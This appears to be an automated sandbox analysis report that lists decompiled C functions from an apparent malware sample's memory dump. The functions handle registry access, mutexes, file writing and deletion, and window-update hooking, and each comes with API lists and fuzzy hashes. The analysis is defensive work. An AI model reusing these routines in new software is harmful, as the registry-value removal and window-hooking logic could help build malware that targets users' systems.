Instruction Fuzzy Hash: 1431E132700311ABD720DFA6EC44F9BB7D8EB94B52F50492AFA51D7240DB34ED4587A8

Uniqueness

Uniqueness Score: -1.00%

Function 00420A60, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 109
memoryCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00420A60(void* __eflags) {
				char _v660;
				short _v1180;
				short _v1700;
				void* _v1712;
				char _v1720;
				char _v1752;
				char _v1776;
				char _v1788;
				intOrPtr _v1792;
				intOrPtr _v1796;
				intOrPtr _v1800;
				intOrPtr _v1804;
				intOrPtr _v1808;
				void* _v1812;
				char _v1824;
				intOrPtr _v1828;
				char _v1832;
				void* __esi;
				void* _t31;
				void* _t32;
				void* _t63;
				intOrPtr* _t64;
				char* _t68;
				signed int _t69;
				void** _t70;
				intOrPtr _t78;

				_t70 =  &_v1812;
				E00410870( &_v1812,  &_v1812, 0, 8);
				E00424100(0x60,  &_v1752);
				E00424100(0x61,  &_v1776);
				_t31 = E00416420(0x80000002,  &_v1752,  &_v1776, 0x104);
				if(_t31 != 0xffffffff && _t31 != 0) {
					ExpandEnvironmentStringsW( &_v1700,  &_v1180, 0x104);
					E004207B0( &_v1180,  &_v1812);
				}
				if(_v1808 == 0) {
					_t68 =  &_v1788;
					E00424100(0x62, _t68);
					_t64 = __imp__SHGetFolderPathW;
					_v1800 = 0x23;
					_v1796 = 0x1a;
					_v1792 = 0x26;
					_v1804 = _t68;
					_t69 = 0;
					do {
						_push( &_v1700);
						_push(0);
						_push(0);
						_push( *((intOrPtr*)(_t70 + 0x14 + _t69 * 4)));
						_push(0);
						if( *_t64() == 0) {
							E00418700( &_v1720,  &_v1824, 1, 2, E00420820,  &_v1832, _t41, _t41, _t41);
						}
						_t69 = _t69 + 1;
					} while (_t69 < 3);
					_t78 = _v1828;
				}
				_t32 = _v1812;
				if(_t78 <= 0) {
					if(_t32 != 0) {
						return HeapFree( *0x42e6d4, 0, _t32);
					}
					goto L16;
				} else {
					_t63 = _t32;
					if(_t32 == 0) {
						L16:
						return _t32;
					} else {
						if( *_t32 != 0) {
							E00424100(0x63,  &_v660);
							E0040D880(_t63, 0xcb,  &_v660);
						}
						return HeapFree( *0x42e6d4, 0, _t63);
					}
				}
			}

0x00420a60
0x00420a71
0x00420a7f
0x00420a8d
0x00420aab
0x00420ab3
0x00420ace
0x00420ae1
0x00420ae1
0x00420aeb
0x00420aed
0x00420af6
0x00420afb
0x00420b03
0x00420b0b
0x00420b13
0x00420b1b
0x00420b1f
0x00420b21
0x00420b29
0x00420b2a
0x00420b2c
0x00420b2e
0x00420b2f
0x00420b35
0x00420b53
0x00420b53
0x00420b58
0x00420b59
0x00420b5e
0x00420b5e
0x00420b63
0x00420b67
0x00420baf
0x00000000
0x00420bbb
0x00000000
0x00420b69
0x00420b69
0x00420b6d
0x00420bc9
0x00420bc9
0x00420b6f
0x00420b73
0x00420b81
0x00420b90
0x00420b90
0x00420bac
0x00420bac
0x00420b6d

APIs

Part of subcall function 00416420: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000001,00000000,?,00000000,00000000,?,004106E6,?,?,00000104,?,00000000), ref: 00416448
Part of subcall function 00416420: RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00416469
Part of subcall function 00416420: RegCloseKey.ADVAPI32(?,?,00000000), ref: 0041647B

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,00000000,00000000,00000008,?,00000000), ref: 00420ACE
SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?,?), ref: 00420B31
HeapFree.KERNEL32(?,00000000,?,?,?,00000104,00000000,00000000), ref: 00420B9E
HeapFree.KERNEL32(?,00000000,?,?,?,00000104,00000000,00000000), ref: 00420BBB

Strings

&, xrefs: 00420B13
#, xrefs: 00420B03

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap$CloseEnvironmentExpandFolderOpenPathQueryStringsValue
String ID: #$&
API String ID: 2803132047-3870246384
Opcode ID: 86513f084deb74ac85c27ef12ef1d3b6135b7c2c306b57b0ff0ee37d446761b3
Instruction ID: 54097a956722f362ae01df46ae7e672af1e15e3138718c7b55b777e4d0e0a482
Opcode Fuzzy Hash: 86513f084deb74ac85c27ef12ef1d3b6135b7c2c306b57b0ff0ee37d446761b3
Instruction Fuzzy Hash: EA31F5317043116BE724DB55EC45FAB77E8EBC4704F80482EF644972D1DBB8A849CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00419A20, Relevance: 10.6, APIs: 7, Instructions: 109
memoryCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00419A20(int __eax, struct HDC__* _a4) {
				struct HDC__* _v24;
				long _v40;
				void* _v44;
				void** _v48;
				BITMAPINFO** _v52;
				struct HDC__* _v56;
				void* _t30;
				struct HBITMAP__* _t40;
				void* _t41;
				int _t44;
				signed int _t50;
				struct HDC__* _t52;
				struct HBITMAP__* _t55;
				BITMAPINFO* _t56;
				BITMAPINFO** _t58;

				_t44 = __eax;
				_t55 = 0;
				_t56 = HeapAlloc( *0x42e6d4, 8, 0x42c);
				if(_t56 == 0) {
					L13:
					if(_t44 != 0) {
						DeleteObject(_t44);
					}
					return _t55;
				}
				_t56->bmiHeader = 0x28;
				if(GetDIBits(_a4, _t44, 0, 1, 0, _t56, 0) == 0) {
					L12:
					HeapFree( *0x42e6d4, 0, _t56);
					goto L13;
				}
				_t52 = _v24;
				if(GetDIBits(_t52, _t44, 0, 1, 0, _t56, 0) == 0) {
					goto L12;
				}
				DeleteObject(_t44);
				asm("cdq");
				_t50 =  ~((_t56->bmiHeader.biHeight ^ _t52) - _t52);
				_t44 = 0;
				_t30 = (_t56->bmiHeader.biBitCount & 0x0000ffff) - 1;
				_t56->bmiHeader.biHeight = _t50;
				if(_t30 == 0) {
					L7:
					_t52 = 8;
					_t56->bmiHeader.biClrUsed = _t44;
					_t56->bmiHeader.biBitCount = 8;
					_t56->bmiHeader.biClrImportant = _t44;
					L8:
					_t58 = _v52;
					asm("cdq");
					_t53 = _t52 & 0x00000007;
					asm("cdq");
					_t56->bmiHeader.biSizeImage = ((_t56->bmiHeader.biBitCount & 0x0000ffff) * _t56->bmiHeader.biWidth * _t50 + (_t52 & 0x00000007) >> 0x00000003 ^ _t53) - _t53;
					_t56->bmiHeader.biCompression = _t44;
					if(_t58 != _t44) {
						 *_t58 = _t56;
					}
					_t40 = CreateDIBSection(_v56, _t56, _t44, _v48, _v44, _v40);
					_t55 = _t40;
					if(_t55 == 0 || _t58 == 0) {
						goto L12;
					} else {
						return _t40;
					}
				}
				_t41 = _t30 - 3;
				if(_t41 == 0) {
					goto L7;
				}
				if(_t41 == 0x14) {
					_t56->bmiHeader.biBitCount = 0x20;
				}
				goto L8;
			}

0x00419a29
0x00419a33
0x00419a3b
0x00419a3f
0x00419b20
0x00419b22
0x00419b25
0x00419b25
0x00000000
0x00419b2b
0x00419a57
0x00419a61
0x00419b10
0x00419b1a
0x00000000
0x00419b1a
0x00419a67
0x00419a77
0x00000000
0x00000000
0x00419a7e
0x00419a87
0x00419a92
0x00419a94
0x00419a96
0x00419a97
0x00419a9a
0x00419ab1
0x00419ab1
0x00419ab6
0x00419ab9
0x00419abd
0x00419ac0
0x00419ac8
0x00419acf
0x00419ad0
0x00419ad8
0x00419add
0x00419ae0
0x00419ae5
0x00419ae7
0x00419ae7
0x00419b00
0x00419b06
0x00419b0a
0x00000000
0x00419b31
0x00419b31
0x00419b31
0x00419b0a
0x00419a9c
0x00419a9f
0x00000000
0x00000000
0x00419aa4
0x00419aab
0x00419aab
0x00000000

APIs

HeapAlloc.KERNEL32(?,00000008,0000042C,00000000,0042EEA0,73BBA520,00000000,004263BC,00000000,?,0042EEC0,00000000,00000000), ref: 00419A35
GetDIBits.GDI32(?,00000000,00000000,00000001,00000000,00000000,00000000), ref: 00419A5D
GetDIBits.GDI32(?,00000000,00000000,00000001,00000000,00000000,00000000), ref: 00419A73
DeleteObject.GDI32(00000000), ref: 00419A7E
CreateDIBSection.GDI32(?,00000000,00000000,?,?,?), ref: 00419B00
HeapFree.KERNEL32(?,00000000,00000000), ref: 00419B1A
DeleteObject.GDI32(00000000), ref: 00419B25

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: BitsDeleteHeapObject$AllocCreateFreeSection
String ID:
API String ID: 1563147186-0
Opcode ID: 9dc981f52386d3f76047173f63d54110160d8d0043ab4de156f398688af17960
Instruction ID: 402333894caf689d7fc3123f31c73ea50e6f536203bedcac24a4e64f26a6ef4b
Opcode Fuzzy Hash: 9dc981f52386d3f76047173f63d54110160d8d0043ab4de156f398688af17960
Instruction Fuzzy Hash: F1318EB5200741ABC7348F66ED98E677AE9EFC9740F04892EF686D6650D734EC40C768

Uniqueness

Uniqueness Score: -1.00%

Function 0040DB30, Relevance: 10.6, APIs: 7, Instructions: 108
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E0040DB30(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, char _a8, intOrPtr _a12, char _a16) {
				void* _v4;
				void* _v16;
				void* _t18;
				void* _t19;
				void* _t26;
				void* _t27;
				void* _t34;
				signed int _t50;
				void* _t58;
				char _t62;

				_t62 = _a16;
				if(_t62 <= 1) {
					L20:
					__eflags = 0;
					return 0;
				} else {
					_t18 = E0040C330();
					_v4 = _t18;
					if(_t18 == 0) {
						goto L20;
					} else {
						_push(__esi);
						_t50 = 1;
						_a16 = 0;
						if(_t62 <= 1) {
							L17:
							__eflags = _t18;
							if(_t18 != 0) {
								HeapFree( *0x42e6d4, 0, _t18);
							}
							_t19 =  *0x42d420; // 0x0
							ReleaseMutex(_t19);
							CloseHandle(_t19);
							return 1;
						} else {
							while(1) {
								_t58 = E004109D0( *((intOrPtr*)(_a12 + _t50 * 4)), 0, 0xffffffff);
								if(_t58 == 0) {
									break;
								}
								_push(_t58);
								if(_a8 == 0) {
									_push( &_v4);
									_push(_a4);
									_t34 = E004244A0(__eflags);
								} else {
									_push( &_v4);
									_push(_a4);
									_t34 = E004242F0(_a4);
								}
								if(_t34 != 0) {
									_a16 = 1;
								}
								HeapFree( *0x42e6d4, 0, _t58);
								_t50 = _t50 + 1;
								if(_t50 < _t62) {
									continue;
								} else {
									if(_a16 == 0) {
										_t18 = _v4;
										goto L17;
									} else {
										return E0040C3F0(_v4);
									}
								}
								goto L21;
							}
							_t26 = _v4;
							__eflags = _t26;
							if(_t26 != 0) {
								HeapFree( *0x42e6d4, 0, _t26);
							}
							_t27 =  *0x42d420; // 0x0
							ReleaseMutex(_t27);
							CloseHandle(_t27);
							__eflags = 0;
							return 0;
						}
					}
				}
				L21:
			}

0x0040db32
0x0040db39
0x0040dc46
0x0040dc46
0x0040dc4a
0x0040db3f
0x0040db3f
0x0040db44
0x0040db4a
0x00000000
0x0040db50
0x0040db57
0x0040db59
0x0040db5e
0x0040db65
0x0040dc17
0x0040dc17
0x0040dc19
0x0040dc25
0x0040dc25
0x0040dc27
0x0040dc2f
0x0040dc36
0x0040dc43
0x0040db6b
0x0040db70
0x0040db80
0x0040db84
0x00000000
0x00000000
0x0040db8b
0x0040db8c
0x0040dba7
0x0040dba8
0x0040dba9
0x0040db8e
0x0040db96
0x0040db97
0x0040db98
0x0040db98
0x0040dbb0
0x0040dbb2
0x0040dbb2
0x0040dbc1
0x0040dbc3
0x0040dbc6
0x00000000
0x0040dbc8
0x0040dbcd
0x0040dc13
0x00000000
0x0040dbcf
0x0040dbde
0x0040dbde
0x0040dbcd
0x00000000
0x0040dbc6
0x0040dbe1
0x0040dbe5
0x0040dbe7
0x0040dbf2
0x0040dbf2
0x0040dbf4
0x0040dbfc
0x0040dc03
0x0040dc0c
0x0040dc10
0x0040dc10
0x0040db65
0x0040db4a
0x00000000

APIs

Part of subcall function 0040C330: CreateMutexW.KERNEL32(0042E930,00000000,0042D490,74B05520,00000000), ref: 0040C37B
Part of subcall function 0040C330: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040C38A
Part of subcall function 0040C330: HeapAlloc.KERNEL32(?,00000008,00000034), ref: 0040C3B5

HeapFree.KERNEL32(?,00000000,00000000,00000000,000000FF), ref: 0040DBC1
HeapFree.KERNEL32(?,00000000,?,00000000,000000FF), ref: 0040DBF2
ReleaseMutex.KERNEL32(00000000,00000000,000000FF), ref: 0040DBFC
CloseHandle.KERNEL32(00000000), ref: 0040DC03
HeapFree.KERNEL32(?,00000000,00000000), ref: 0040DC25
ReleaseMutex.KERNEL32(00000000), ref: 0040DC2F
CloseHandle.KERNEL32(00000000), ref: 0040DC36

Part of subcall function 004109D0: WideCharToMultiByte.KERNEL32(77E49EB0,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,77E49EB0,?,00411F1F,0000FDE9,00000000,00000000,00000000), ref: 00410A1C
Part of subcall function 004109D0: HeapAlloc.KERNEL32(?,00000008,00000005), ref: 00410A38
Part of subcall function 004109D0: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00410A6D

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$FreeMutex$AllocByteCharCloseHandleMultiReleaseWide$CreateObjectSingleWait
String ID:
API String ID: 3208849178-0
Opcode ID: 1406900a1d69db63c5c14bff5a1ec97422740e65660f90341659712d1e2965dc
Instruction ID: a91b224ca0553d3d7ae6fb1dfc3652ef0c643f9a0758a27de6ecb65b2544d8cd
Opcode Fuzzy Hash: 1406900a1d69db63c5c14bff5a1ec97422740e65660f90341659712d1e2965dc
Instruction Fuzzy Hash: 7531E6726093115BD220EBA9AC84F6BB3E8AB89314F14457FF541E72C1CB79EC09C769

Uniqueness

Uniqueness Score: -1.00%

Function 0041C2B0, Relevance: 10.6, APIs: 7, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041C2B0(struct HWND__* __ecx, intOrPtr* __edx) {
				struct tagRECT _v24;
				intOrPtr _v36;
				void* __edi;
				intOrPtr _t26;
				struct HWND__* _t33;
				signed int _t40;
				signed int _t47;
				RECT* _t60;
				intOrPtr* _t64;
				struct HWND__* _t66;
				struct HWND__* _t68;
				signed int _t70;
				void* _t72;
				signed int _t79;

				_t72 = (_t70 & 0xfffffff8) - 0x18;
				_t64 = __edx;
				_t68 = __ecx;
				 *( *(__edx + 0x14)) = 0x3c;
				if(GetWindowInfo(__ecx,  *(__edx + 0x14)) != 0) {
					_t26 =  *((intOrPtr*)(_t64 + 0x14));
					_t47 =  *(_t26 + 0x24);
					if((_t47 & 0x40000000) == 0) {
						_t60 =  *_t64 + 0x24;
						__eflags = _t60;
					} else {
						_t60 = _t64 + 4;
					}
					if((_t47 & 0x10000000) != 0) {
						if((IntersectRect( &_v24, _t26 + 0x14, _t60) & 0xffffff00 | _t28 != 0x00000000) != 0) {
							L8:
							E0041C0F0(_t68,  *_t64, _t80, _t60,  *((intOrPtr*)(_t64 + 0x14)));
							_v36 =  *_t64;
							_v24.right =  *((intOrPtr*)(_t64 + 0x14));
							_t33 = GetTopWindow(_t68);
							if(_t33 != 0) {
								_t66 = GetWindow(_t33, 1);
								if(_t66 != 0) {
									while(E0041C2B0(_t66, _t72 + 0x10) != 0) {
										_t66 = GetWindow(_t66, 3);
										if(_t66 != 0) {
											continue;
										}
										goto L13;
									}
								}
							}
						} else {
							if(IsRectEmpty( *((intOrPtr*)(_t64 + 0x14)) + 0x14) != 0) {
								_t40 = IntersectRect( &_v24,  *((intOrPtr*)(_t64 + 0x14)) + 4, _t60);
								_t79 = _t40;
								_t80 = _t40 & 0xffffff00 | _t79 != 0x00000000;
								if((_t40 & 0xffffff00 | _t79 != 0x00000000) != 0) {
									goto L8;
								}
							}
						}
					}
				}
				L13:
				return 1;
			}

0x0041c2b6
0x0041c2bd
0x0041c2bf
0x0041c2c4
0x0041c2d7
0x0041c2dd
0x0041c2e0
0x0041c2e9
0x0041c2f2
0x0041c2f2
0x0041c2eb
0x0041c2eb
0x0041c2eb
0x0041c2fb
0x0041c31a
0x0041c345
0x0041c34e
0x0041c359
0x0041c35d
0x0041c361
0x0041c369
0x0041c376
0x0041c37a
0x0041c380
0x0041c394
0x0041c398
0x00000000
0x00000000
0x00000000
0x0041c398
0x0041c380
0x0041c37a
0x0041c31c
0x0041c32b
0x0041c33a
0x0041c33c
0x0041c341
0x0041c343
0x00000000
0x00000000
0x0041c343
0x0041c32b
0x0041c31a
0x0041c2fb
0x0041c39a
0x0041c3a3

APIs

GetWindowInfo.USER32 ref: 0041C2CF
IntersectRect.USER32 ref: 0041C311
IsRectEmpty.USER32(?), ref: 0041C323
IntersectRect.USER32 ref: 0041C33A
GetTopWindow.USER32 ref: 0041C361
GetWindow.USER32(00000000,00000001), ref: 0041C374
GetWindow.USER32(00000000,00000003), ref: 0041C392

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$Intersect$EmptyInfo
String ID:
API String ID: 2997981859-0
Opcode ID: 5030d612428bcda4bef33d0ec00132053f65b79cd533423a9d9cd772359d3bb6
Instruction ID: fda41f8fbbc101be70c768c8ca0af515e48843358847e8d905eb06f2eefbb1ba
Opcode Fuzzy Hash: 5030d612428bcda4bef33d0ec00132053f65b79cd533423a9d9cd772359d3bb6
Instruction Fuzzy Hash: 6A21D1322403059BD720CF58DD91BABB3ECAF84714B054A1EFC92A7751DB38EC4687A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040ED80, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75
registrysleepCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040ED80(void* __eflags) {
				char _v672;
				char _v800;
				short _v904;
				short _v912;
				short _v1000;
				short _v1008;
				void* _v1012;
				char _v1013;
				char _v1017;
				void* __esi;
				int* _t27;
				char _t33;
				signed int _t34;

				E0041D150( &_v800);
				E00416E10(0x42eb70,  &_v672,  *0x42e904,  &_v904, 0);
				E00424100(3,  &_v1012);
				_v1017 = 0;
				while(SHDeleteValueW(0x80000001,  &_v1000,  &_v904) == 0) {
					Sleep(0x1f4);
					_v1012 = 0x80000001;
					_t27 = RegOpenKeyExW(0x80000001,  &_v1008, 0, 1,  &_v1012);
					if(_t27 != 0) {
						L6:
						return 1;
					} else {
						_t34 = _t34 & 0xffffff00 | RegQueryValueExW(_v1012,  &_v912, _t27, _t27, _t27, _t27) == 0x00000000;
						RegCloseKey(_v1012);
						if(_t34 == 0) {
							goto L6;
						} else {
							_t33 = _v1013 + 1;
							_v1013 = _t33;
							if(_t33 < 5) {
								continue;
							} else {
								break;
							}
						}
					}
					L7:
				}
				return 0;
				goto L7;
			}

0x0040ed90
0x0040edb4
0x0040edc2
0x0040edd3
0x0040edd8
0x0040edf6
0x0040ee0b
0x0040ee13
0x0040ee17
0x0040ee60
0x0040ee69
0x0040ee19
0x0040ee37
0x0040ee3a
0x0040ee42
0x00000000
0x0040ee44
0x0040ee48
0x0040ee4a
0x0040ee50
0x00000000
0x00000000
0x00000000
0x00000000
0x0040ee50
0x0040ee42
0x00000000
0x0040ee17
0x0040ee5d
0x00000000

APIs

Part of subcall function 00416E10: StringFromGUID2.OLE32(0042EB70,?,00000028,0042EB70,0042EB70,00000010,00000000,00000000), ref: 00416EE6

SHDeleteValueW.SHLWAPI(80000001,?,?,?,?,00000000,750D46D0,00000000,74B05970), ref: 0040EDE7
Sleep.KERNEL32(000001F4), ref: 0040EDF6
RegOpenKeyExW.ADVAPI32 ref: 0040EE13
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 0040EE2A
RegCloseKey.ADVAPI32(?), ref: 0040EE3A

Strings

pB, xrefs: 0040EDAF

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Value$CloseDeleteFromOpenQuerySleepString
String ID: pB
API String ID: 4264976084-3059159000
Opcode ID: e9f7229bbbfc3a02169ace064383ecb1397ef022780664c17851e15a951e2ec8
Instruction ID: 6ecfd818d699e99809ca1c013d5d3cd6fdf022374d3b4ff294c436ec0a0fe954
Opcode Fuzzy Hash: e9f7229bbbfc3a02169ace064383ecb1397ef022780664c17851e15a951e2ec8
Instruction Fuzzy Hash: 3321F272244341AFE310DB55EC40FFB77ACEBC4700F04482EFA84A2290D639A949CBB6

Uniqueness

Uniqueness Score: -1.00%

Function 0040EE70, Relevance: 10.6, APIs: 7, Instructions: 72
filesleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040EE70(WCHAR* __edi, void* _a4, long _a8, char _a12) {
				long _v4;
				char _v5;
				long _t18;
				long _t20;
				signed char _t21;
				void* _t23;
				WCHAR* _t25;
				void* _t26;

				_t25 = __edi;
				_v5 = 0;
				while(1) {
					SetFileAttributesW(_t25, 0x20);
					_t20 = 0;
					_t26 = CreateFileW(_t25, 0x40000000, 1, 0, 2, 0x80, 0);
					if(_t26 == 0xffffffff) {
						goto L9;
					}
					_t23 = _a4;
					if(_t23 == 0) {
						L5:
						_t20 = 1;
					} else {
						_t18 = _a8;
						if(_t18 == 0 || WriteFile(_t26, _t23, _t18,  &_v4, 0) != 0) {
							goto L5;
						}
					}
					CloseHandle(_t26);
					if(_t20 != 1) {
						SetFileAttributesW(_t25, 0x80);
						DeleteFileW(_t25);
					}
					if(_t20 != 0) {
						return 1;
					} else {
						goto L9;
					}
					L14:
					L9:
					if(_a12 != 0 || _v5 != 0xa) {
						_t21 = _v5;
						Sleep((_t21 & 0x000000ff) + 0x1388);
						_v5 = _t21 + 1;
						continue;
					} else {
						return 0;
					}
					goto L14;
				}
			}

0x0040ee70
0x0040ee7c
0x0040ee81
0x0040ee84
0x0040ee99
0x0040eea1
0x0040eea6
0x00000000
0x00000000
0x0040eea8
0x0040eeae
0x0040eecc
0x0040eecc
0x0040eeb0
0x0040eeb0
0x0040eeb6
0x00000000
0x00000000
0x0040eeb6
0x0040eecf
0x0040eed8
0x0040eee0
0x0040eee3
0x0040eee3
0x0040eeeb
0x0040ef21
0x00000000
0x00000000
0x00000000
0x00000000
0x0040eeed
0x0040eef2
0x0040eefb
0x0040ef08
0x0040ef10
0x00000000
0x0040ef26
0x0040ef2c
0x0040ef2c
0x00000000
0x0040eef2

APIs

SetFileAttributesW.KERNEL32(?,00000020), ref: 0040EE84
CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 0040EE9B
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040EEC2
CloseHandle.KERNEL32(00000000), ref: 0040EECF
SetFileAttributesW.KERNEL32(?,00000080), ref: 0040EEE0
DeleteFileW.KERNEL32(?), ref: 0040EEE3
Sleep.KERNEL32(-00001388), ref: 0040EF08

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Attributes$CloseCreateDeleteHandleSleepWrite
String ID:
API String ID: 1913434650-0
Opcode ID: 0544e090cb447befd51db35dbace06d106491ab817d270dc4ab25c07c2d43996
Instruction ID: 1bce0f8d5e844f86d384b1c48a149489a30c58b75bb0fd2e055d61d506319231
Opcode Fuzzy Hash: 0544e090cb447befd51db35dbace06d106491ab817d270dc4ab25c07c2d43996
Instruction Fuzzy Hash: D7115E302853047AE7205731DC45FBB7B989B92711F08492EF980B62D0C77D985AD3BE

Uniqueness

Uniqueness Score: -1.00%

Function 00415D50, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00415D50(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				short _v520;
				short* _t19;
				int _t20;
				intOrPtr _t24;
				int _t29;
				char* _t32;
				int _t36;

				if(GetTempFileNameW(_a12 + 0x746, L"cab", 0,  &_v520) == 0) {
					L10:
					return 0;
				} else {
					SetFileAttributesW( &_v520, 0x80);
					if(DeleteFileW( &_v520) == 0) {
						goto L10;
					} else {
						_t24 = _a4;
						_t36 = _a8 + 0xfffffffd;
						_t32 = _t24 + 3;
						_t19 = PathFindFileNameW( &_v520);
						_t29 = 0;
						if(_t19 != 0 &&  *_t19 != 0) {
							do {
								_t29 = _t29 + 1;
							} while (_t19[_t29] != 0);
						}
						_t20 = WideCharToMultiByte(0, 0, _t19, _t29, _t32, _t36, 0, 0);
						if(_t36 > 0) {
							if(_t20 >= _t36) {
								_t20 = 0;
							}
							_t32[_t20] = 0;
						}
						E00410820(_t24, "?T", 2);
						 *((char*)(_t24 + 2)) = 0x5c;
						return 1;
					}
				}
			}

0x00415d77
0x00415e10
0x00415e19
0x00415d7d
0x00415d87
0x00415d9a
0x00000000
0x00415d9c
0x00415da4
0x00415db1
0x00415db4
0x00415db7
0x00415dbd
0x00415dc1
0x00415dc8
0x00415dc8
0x00415dc9
0x00415dc8
0x00415ddc
0x00415de4
0x00415de8
0x00415dea
0x00415dea
0x00415dec
0x00415dec
0x00415df8
0x00415dfe
0x00415e0f
0x00415e0f
0x00415d9a

APIs

GetTempFileNameW.KERNEL32(?,cab,00000000,?), ref: 00415D6F
SetFileAttributesW.KERNEL32(00000080,00000080), ref: 00415D87
DeleteFileW.KERNEL32(?), ref: 00415D92
PathFindFileNameW.SHLWAPI(?), ref: 00415DB7
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00415DDC

Strings

cab, xrefs: 00415D63

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Name$AttributesByteCharDeleteFindMultiPathTempWide
String ID: cab
API String ID: 2491076439-1787492089
Opcode ID: 7182292117bbe9b93a277e95438b5ae66fc2e8906000bac0da5c5adbd3af40b6
Instruction ID: d4613d1d6abeb9f89cf73364457105ccd8868a99fd081a2bcbad2a65d7062fa3
Opcode Fuzzy Hash: 7182292117bbe9b93a277e95438b5ae66fc2e8906000bac0da5c5adbd3af40b6
Instruction Fuzzy Hash: 5911D631600310BBE734AB24DC49FDB7BA8AF84B50F44852AB559EB1D1E678D940C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 0041BDF1, Relevance: 10.6, APIs: 7, Instructions: 66
synchronizationwindowCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0041BDF1(void* __eax, struct HWND__* _a8, struct HRGN__* _a12, int _a16) {
				intOrPtr _v4;
				int _t26;
				signed int _t27;
				struct HWND__* _t32;
				char* _t48;

				_t32 = _a8;
				if(__eax + 0x42e94b == 0 || WaitForSingleObject( *0x42edbc, 0) == 0) {
					L7:
					return GetUpdateRgn(_t32, _a12, _a16);
				} else {
					_t48 = TlsGetValue( *0x42eea4);
					if(_t48 == 0 || _t32 !=  *((intOrPtr*)(_t48 + 4))) {
						goto L7;
					} else {
						SetRectRgn(_a12,  *(_t48 + 0xc),  *(_t48 + 0x10),  *(_t48 + 0x14),  *(_t48 + 0x18));
						if(_v4 != 0) {
							_t26 = SaveDC( *(_t48 + 8));
							_t27 = SendMessageW(_t32, 0x14,  *(_t48 + 8), 0);
							asm("sbb eax, eax");
							 *((intOrPtr*)(_t48 + 0x1c)) =  ~_t27 + 1;
							RestoreDC( *(_t48 + 8), _t26);
						}
						 *_t48 = 1;
						return 2;
					}
				}
			}

0x0041bdf8
0x0041bdfd
0x0041be8c
0x0041be9f
0x0041be15
0x0041be22
0x0041be26
0x00000000
0x0041be2d
0x0041be42
0x0041be4d
0x0041be54
0x0041be65
0x0041be6d
0x0041be70
0x0041be78
0x0041be7e
0x0041be7f
0x0041be89
0x0041be89
0x0041be26

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 0041BE0B
